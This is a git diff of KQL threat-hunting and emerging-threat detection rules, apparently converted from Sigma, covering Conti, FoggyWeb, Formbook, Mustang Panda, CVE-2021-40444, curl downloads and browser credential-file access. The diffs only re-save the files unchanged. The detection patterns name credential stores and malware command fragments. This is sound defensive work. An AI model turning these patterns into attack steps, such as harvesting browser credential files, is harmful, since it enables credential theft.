+++ b/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql
@@ -1,10 +1,10 @@
-// Title: Conti Volume Shadow Listing
-// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
-// Date: 2021-08-09
-// Level: high
-// Description: Detects a command used by conti to find volume shadow backups
-// MITRE Tactic: Resource Development
-// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Conti Volume Shadow Listing
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects a command used by conti to find volume shadow backups
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "vssadmin list shadows" and ProcessCommandLine contains "log.txt"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql
index 06914cb0..671f391a 100644
--- a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql
+++ b/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql
@@ -1,12 +1,12 @@
-// Title: FoggyWeb Backdoor DLL Loading
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-09-27
-// Level: critical
-// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: FoggyWeb Backdoor DLL Loading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-09-27
+// Level: critical
+// Description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath =~ "C:\\Windows\\ADFS\\version.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql
index 4d0dd96b..cdac7d56 100644
--- a/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql
+++ b/KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql
@@ -1,10 +1,10 @@
-// Title: Formbook Process Creation
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019-09-30
-// Level: high
-// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Formbook Process Creation
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-09-30
+// Level: high
+// Description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587.001, detection.emerging-threats
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine endswith ".exe" and (InitiatingProcessCommandLine startswith "C:\\Windows\\System32\\" or InitiatingProcessCommandLine startswith "C:\\Windows\\SysWOW64\\")) and ((ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\") or (ProcessCommandLine contains "/c" and ProcessCommandLine contains "del" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\") or (ProcessCommandLine contains "/C" and ProcessCommandLine contains "type nul >" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\Desktop\\")) and ProcessCommandLine endswith ".exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql
index c34e093f..6cb47e3b 100644
--- a/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql
+++ b/KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql
@@ -1,12 +1,12 @@
-// Title: Mustang Panda Dropper
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019-10-30
-// Level: high
-// Description: Detects specific process parameters as used by Mustang Panda droppers
-// MITRE Tactic: Resource Development
-// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Mustang Panda Dropper
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2019-10-30
+// Level: high
+// Description: Detects specific process parameters as used by Mustang Panda droppers
+// MITRE Tactic: Resource Development
+// Tags: attack.t1587.001, attack.resource-development, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "Temp\\wtask.exe /create" or ProcessCommandLine contains "%windir:~-3,1%%PUBLIC:~-9,1%" or ProcessCommandLine contains "/tn \"Security Script " or ProcessCommandLine contains "%windir:~-1,1%") or (ProcessCommandLine contains "/E:vbscript" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains ".txt" and ProcessCommandLine contains "/F")) or FolderPath endswith "Temp\\winwsh.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql
index 4a9cea7b..18b31d5f 100644
--- a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql
+++ b/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Word Cab File Write CVE-2021-40444
-// Author: Florian Roth (Nextron Systems), Sittikorn S
-// Date: 2021-09-10
-// Level: high
-// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
-// MITRE Tactic: Resource Development
-// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
-
-DeviceFileEvents
+// Title: Suspicious Word Cab File Write CVE-2021-40444
+// Author: Florian Roth (Nextron Systems), Sittikorn S
+// Date: 2021-09-10
+// Level: high
+// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1587, detection.emerging-threats
+
+DeviceFileEvents
 | where ((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\Windows\\INetCache" and FolderPath endswith ".cab") or (InitiatingProcessFolderPath endswith "\\winword.exe" and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".inf"))) and (not((FolderPath contains "AppData\\Local\\Temp" and FolderPath endswith "\\Content.inf" and FolderPath startswith "C:\\Users\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
index 549dd621..0f8ca697 100644
--- a/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
+++ b/KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql
@@ -1,16 +1,16 @@
-// Title: Clipboard Data Collection Via Pbpaste
-// Author: Daniel Cortez
-// Date: 2024-07-30
-// Level: medium
-// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
-// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
-// It can also be used in shell scripts that may require clipboard content as input.
-// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
-// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Clipboard Data Collection Via Pbpaste
+// Author: Daniel Cortez
+// Date: 2024-07-30
+// Level: medium
+// Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
+// The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
+// It can also be used in shell scripts that may require clipboard content as input.
+// Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
+// Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.credential-access, attack.t1115, detection.threat-hunting
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/pbpaste"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql
index 9d43295f..1d68187a 100644
--- a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql
+++ b/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql
@@ -1,12 +1,12 @@
-// Title: Password Protected Compressed File Extraction Via 7Zip
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-10
-// Level: low
-// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
-// False Positives:
-// - Legitimate activity is expected since extracting files with a password can be common in some environment.
-
-DeviceProcessEvents
+// Title: Password Protected Compressed File Extraction Via 7Zip
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-10
+// Level: low
+// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+// False Positives:
+// - Legitimate activity is expected since extracting files with a password can be common in some environment.
+
+DeviceProcessEvents
 | where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql
index c392e3c7..8abde06b 100644
--- a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql
+++ b/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql
@@ -1,10 +1,10 @@
-// Title: Potentially Suspicious Compression Tool Parameters
-// Author: Florian Roth (Nextron Systems), Samir Bousseaden
-// Date: 2019-10-15
-// Level: medium
-// Description: Detects potentially suspicious command line arguments of common data compression tools
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Compression Tool Parameters
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2019-10-15
+// Level: medium
+// Description: Detects potentially suspicious command line arguments of common data compression tools
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " -p" or ProcessCommandLine contains " -ta" or ProcessCommandLine contains " -tb" or ProcessCommandLine contains " -sdel" or ProcessCommandLine contains " -dw" or ProcessCommandLine contains " -hp") and ((ProcessVersionInfoOriginalFileName contains "7z" and ProcessVersionInfoOriginalFileName contains ".exe") or ProcessVersionInfoOriginalFileName endswith "rar.exe" or (ProcessVersionInfoOriginalFileName contains "Command" and ProcessVersionInfoOriginalFileName contains "Line" and ProcessVersionInfoOriginalFileName contains "RAR"))) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql
index 4c19b2cc..6a9853bb 100644
--- a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql
+++ b/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql
@@ -1,12 +1,12 @@
-// Title: System Drawing DLL Load
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: low
-// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
-// MITRE Tactic: Collection
-// Tags: attack.collection, attack.t1113, detection.threat-hunting
-// False Positives:
-// - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness
-
-DeviceImageLoadEvents
+// Title: System Drawing DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: low
+// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113, detection.threat-hunting
+// False Positives:
+// - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\System.Drawing.ni.dll"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql
index 6a609ab3..07bf3686 100644
--- a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql
+++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql
@@ -1,13 +1,13 @@
-// Title: Curl.EXE Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-05
-// Level: low
-// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
-// False Positives:
-// - Scripts created by developers and admins
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Curl.EXE Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-05
+// Level: low
+// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
 | where FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql
index 2f6a2f58..0a262283 100644
--- a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql
+++ b/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql
@@ -1,13 +1,13 @@
-// Title: Curl.EXE Execution With Custom UserAgent
-// Author: frack113
-// Date: 2022-01-23
-// Level: medium
-// Description: Detects execution of curl.exe with custom useragent options
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting
-// False Positives:
-// - Scripts created by developers and admins
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Curl.EXE Execution With Custom UserAgent
+// Author: frack113
+// Date: 2022-01-23
+// Level: medium
+// Description: Detects execution of curl.exe with custom useragent options
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql
index 6ba7d784..fdba60b6 100644
--- a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql
+++ b/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql
@@ -1,14 +1,14 @@
-// Title: File Download Via Curl.EXE
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-05
-// Level: medium
-// Description: Detects file download using curl.exe
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
-// False Positives:
-// - Scripts created by developers and admins
-// - Administrative activity
-// - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt "
-
-DeviceProcessEvents
+// Title: File Download Via Curl.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-05
+// Level: medium
+// Description: Detects file download using curl.exe
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+// - Administrative activity
+// - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt "
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
index 20b4ab4f..8f4d2604 100644
--- a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
+++ b/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql
@@ -1,14 +1,14 @@
-// Title: Network Connection Initiated From Users\Public Folder
-// Author: Florian Roth (Nextron Systems)
-// Date: 2024-05-31
-// Level: medium
-// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder.
-// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.
-// Use this rule to hunt for potential suspicious or uncommon activity in your environement.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
-// False Positives:
-// - Likely from legitimate third party application that execute from the "Public" directory.
-
-DeviceNetworkEvents
+// Title: Network Connection Initiated From Users\Public Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder.
+// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.
+// Use this rule to hunt for potential suspicious or uncommon activity in your environement.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Likely from legitimate third party application that execute from the "Public" directory.
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath contains ":\\Users\\Public\\" and (not(InitiatingProcessFolderPath contains ":\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
index b93ca019..3315f64c 100644
--- a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
+++ b/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql
@@ -1,14 +1,14 @@
-// Title: Potentially Suspicious Azure Front Door Connection
-// Author: Isaac Dunham
-// Date: 2024-11-07
-// Level: medium
-// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
-// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting
-// False Positives:
-// - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.
-// - Organization-specific Azure Front Door endpoints
-
-DeviceNetworkEvents
+// Title: Potentially Suspicious Azure Front Door Connection
+// Author: Isaac Dunham
+// Date: 2024-11-07
+// Level: medium
+// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
+// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting
+// False Positives:
+// - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.
+// - Organization-specific Azure Front Door endpoints
+
+DeviceNetworkEvents
 | where RemoteUrl contains "azurefd.net" and (not((InitiatingProcessFolderPath endswith "searchapp.exe" or (RemoteUrl contains "afdxtest.z01.azurefd.net" or RemoteUrl contains "fp-afd.azurefd.net" or RemoteUrl contains "fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net" or RemoteUrl contains "roxy.azurefd.net" or RemoteUrl contains "powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net" or RemoteUrl contains "storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net" or RemoteUrl contains "graph.azurefd.net") or (InitiatingProcessFolderPath endswith "brave.exe" or InitiatingProcessFolderPath endswith "chrome.exe" or InitiatingProcessFolderPath endswith "chromium.exe" or InitiatingProcessFolderPath endswith "firefox.exe" or InitiatingProcessFolderPath endswith "msedge.exe" or InitiatingProcessFolderPath endswith "msedgewebview2.exe" or InitiatingProcessFolderPath endswith "opera.exe" or InitiatingProcessFolderPath endswith "vivaldi.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
index d890d718..0ad02020 100644
--- a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
+++ b/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
@@ -1,20 +1,20 @@
-// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
-// Author: @kostastsale
-// Date: 2023-04-13
-// Level: medium
-// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
-// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
-// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
-// Hunting Opportunity 1- Weed Out The Noise
-// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
-// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
-// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
-// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
-// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting
-// False Positives:
-// - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities.
-
-DeviceProcessEvents
+// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
+// Author: @kostastsale
+// Date: 2023-04-13
+// Level: medium
+// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
+// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
+// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
+// Hunting Opportunity 1- Weed Out The Noise
+// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
+// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
+// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
+// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
+// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting
+// False Positives:
+// - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities.
+
+DeviceProcessEvents
 | where (FolderPath contains "\\Windows\\Action1\\package_downloads\\" and InitiatingProcessFolderPath endswith "\\action1_agent.exe") or ((InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_Command_" or InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_PowerShell_") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")) or FolderPath endswith "\\agent1_remote.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
index 41c8032f..8765c14f 100644
--- a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
+++ b/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql
@@ -1,12 +1,12 @@
-// Title: VsCode Code Tunnel Execution File Indicator
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-25
-// Level: medium
-// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
-// MITRE Tactic: Command and Control
-// Tags: attack.command-and-control, detection.threat-hunting
-// False Positives:
-// - Legitimate usage of VsCode tunneling functionality will also trigger this
-
-DeviceFileEvents
+// Title: VsCode Code Tunnel Execution File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-25
+// Level: medium
+// Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, detection.threat-hunting
+// False Positives:
+// - Legitimate usage of VsCode tunneling functionality will also trigger this
+
+DeviceFileEvents
 | where FolderPath endswith "\\code_tunnel.json"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
index e03e9d3c..1c745702 100644
--- a/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
+++ b/KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql
@@ -1,17 +1,17 @@
-// Title: Access To Browser Credential Files By Uncommon Applications
-// Author: frack113, X__Junior (Nextron Systems)
-// Date: 2022-04-09
-// Level: low
-// Description: Detects file access requests to browser credential stores by uncommon processes.
-// Could indicate potential attempt of credential stealing.
-// Requires heavy baselining before usage
-// MITRE Tactic: Credential Access
-// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
-// False Positives:
-// - Antivirus, Anti-Spyware, Anti-Malware Software
-// - Backup software
-// - Legitimate software installed on partitions other than "C:\"
-// - Searching software such as "everything.exe"
-
-DeviceFileEvents
+// Title: Access To Browser Credential Files By Uncommon Applications
+// Author: frack113, X__Junior (Nextron Systems)
+// Date: 2022-04-09
+// Level: low
+// Description: Detects file access requests to browser credential stores by uncommon processes.
+// Could indicate potential attempt of credential stealing.
+// Requires heavy baselining before usage
+// MITRE Tactic: Credential Access
+// Tags: attack.t1003, attack.credential-access, detection.threat-hunting
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Backup software
+// - Legitimate software installed on partitions other than "C:\"
+// - Searching software such as "everything.exe"
+
+DeviceFileEvents
 | where ((FileName contains "\\User Data\\Default\\Login Data" or FileName contains "\\User Data\\Local State") or (FileName endswith "\\cookies.sqlite" or FileName endswith "\\places.sqlite" or FileName endswith "release\\key3.db" or FileName endswith "release\\key4.db" or FileName endswith "release\\logins.json") or FileName endswith "\\Appdata\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not((((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe") and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
